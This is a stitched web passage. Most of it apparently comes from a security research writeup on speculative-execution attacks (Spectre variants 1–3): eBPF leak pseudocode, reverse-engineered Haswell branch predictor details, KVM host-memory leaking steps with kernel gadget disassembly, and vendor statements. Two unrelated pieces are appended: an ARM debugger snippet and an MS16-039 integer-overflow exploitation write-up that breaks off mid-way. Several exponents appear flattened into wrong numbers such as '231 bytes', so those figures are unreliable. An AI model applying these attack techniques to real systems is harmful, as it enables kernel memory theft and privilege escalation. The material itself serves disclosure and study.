This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

 

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_mapthat causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 — 2);
 *bhb_state ^= (src & 0xc000) >> (14 — 4);
 *bhb_state ^= (src & 0x30) << (6 — 4);
 *bhb_state ^= (src & 0x300) << (8 — 8);
 *bhb_state ^= (src & 0x3000) >> (12 — 10);
 *bhb_state ^= (src & 0x30000) >> (16 — 12);
 *bhb_state ^= (src & 0xc0000) >> (18 — 14);
}

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

 

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

 

 

 

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

 

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

 

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

 

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

 

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

 

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

 

 

 

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

 

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

 

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

 

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

 

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

 

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

 

 

 

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

 

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

 

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

 

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

 

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux  are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

 

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

 

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

 

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

 

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

 

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

 

To brute-force the physical address, the following gadget can be used:

 

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

 

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 — the physical address guess minus 0xf8 — is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

 

The eBPF interpreter entry point has the following function signature:

 

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

 

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

 

The eBPF interpreter provides, among other things:

 

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

 

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

 

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

 

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

 

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

 

We do have a few additions to make to Anders Fogh’s blogpost:

 

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

 

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

 

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

 

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

 

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

 

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

 

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

 

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

 

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

 

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

 

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

 

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

 

Specific details regarding the affected processors and mitigations can be found at this website:https://developer.arm.com/support/security-update

 

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

 

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available athttp://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpgReleasePackages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 215 mappings would be more efficient, but the kernel places a hard cap of 216 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

int main(void) {

            double myNumber = 1337.77;

 

            std::cout << myNumber << std::endl;

 

            return 0;

}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see the strd r2, [r11, #-12] and we have to fully understand that this means we are storing the value at the offset of -12 from register r11 into r2. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset location or specifically stored into 0x7efff230 in memory.

Let’s step into twice which executes the vldr d0, [r11, #-12] as we understand that 1337.77 will now be loaded into the double precision math coprocessor d0 register. Let’s now print the value at that location below.

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

MS16-039 — «Windows 10» 64 bits Integer Overflow exploitation by using GDI objects

On April 12, 2016 Microsoft released 13 security bulletins.
Let’s to talk about how I triggered and exploited the CVE-2016-0165, one of the MS16-039 fixes.

Diffing Stage

For  MS16-039, Microsoft released a fix for all Window versions, either for 32 and 64 bits.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 y CVE-2016-0167.

Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».

ms16-039-diff

It’s interesting to say that this function started to be exported since Windows 10, when «win32k.sys» was split into 3 parts:  «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».

If we look at the diff between the old and the new function version, we can see on the right side that in the first red basic block (left-top), there is a call to «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.

In the second red basic block (right-down) there is a call to «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.

Summing up, two integer overflows were patched in the same function.

ms16-039-fdiff

Understanding the fix

If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:

"lea ecx,[rax+rax*2]"

In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).

At the same time, we can see that the structs number is represented by a 64 bit register, but the destination of this calculation is a 32 bit register!

Now, we know that it’s an integer overflow, the only thing we need to know is what number multiplied by 3 gives us a bigger result than 4GB.
The idea is that this result can’t be represented by a 32 bit number.

A simple way to know that is making the next calculation:

(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)

Now, if we multiplied this result by 3, we will obtain the next one:

 0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes

In the same basic block and two instructions below («shl ecx,4»), we can see that the number «2» obtained previously will be shifted 4 times to the left, which is the same to multiply this one by 16, resulting in the 0x20 value.

So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂

Path to the vulnerability

For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls directly to the vulnerable function.

NtGdiPathToRegion

From user space, this function is located in «gdi32.dll» and it’s exported as «PathToRegion«.

Triggering the vulnerability

Now we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability but, is it possible to
reach this number of POINTs?

In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo«.

Looking at the documentation, we see this definition:

BOOL PolylineTo(
 _In_ HDC hdc,
 _In_ const POINT *lppt,
 _In_ DWORD cCount
 );

